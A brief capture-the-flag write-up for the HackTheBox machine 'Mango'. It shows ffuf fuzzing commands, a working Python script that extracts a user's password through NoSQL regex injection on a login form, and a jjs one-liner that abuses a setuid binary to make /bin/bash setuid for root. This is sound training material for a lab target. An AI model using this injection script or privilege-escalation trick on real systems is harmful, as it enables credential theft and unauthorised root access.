Mango @ HackTheBox
Mango is a 30-point linux machine on hackthebox that involves a NoSQL-Injection which allows to obtain user passwords from a mongo database. For root we find the tool jjs, which is owned by root and has the setuid bit set. This allows us to run custom java code as root.
Notes
Fuzzing the webroot:
1
2
3
~/tools/ffuf/ffuf -w ~/tools/SecLists/Discovery/Web-Content/raft-large-files.txt -u http://staging-order.mango.htb/FUZZ -fc 403
~/tools/ffuf/ffuf -w ~/tools/SecLists/Discovery/Web-Content/raft-large-directories.txt -u http://staging-order.mango.htb/FUZZ -fc 403
~/tools/ffuf/ffuf -w ~/tools/SecLists/Discovery/Web-Content/raft-large-directories.txt -u http://staging-order.mango.htb/vendor/FUZZ -fc 403
Installed.json
1
http://staging-order.mango.htb/vendor/composer/installed.json
MongoDB data extraction:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#!/usr/bin/env python3
import re
import requests
import string
chars = string.ascii_letters + string.digits + string.punctuation
password = ""
url = "http://staging-order.mango.htb/"
done = False
while not done:
done = True
for c in chars:
data = {
"username": "mango",
"password[$regex]": f"^{re.escape(password+c)}.*$",
"login": "login"
}
r = requests.post(url, data=data, allow_redirects=False)
if r.status_code == 302:
done = False
password += c
print(f"[+] Found {c}")
print(f"[+] Password: {password}")
Jjs:
1
Java.type('java.lang.Runtime').getRuntime().exec('chmod u+s /bin/bash').waitFor()
This post is licensed under CC BY 4.0 by the author.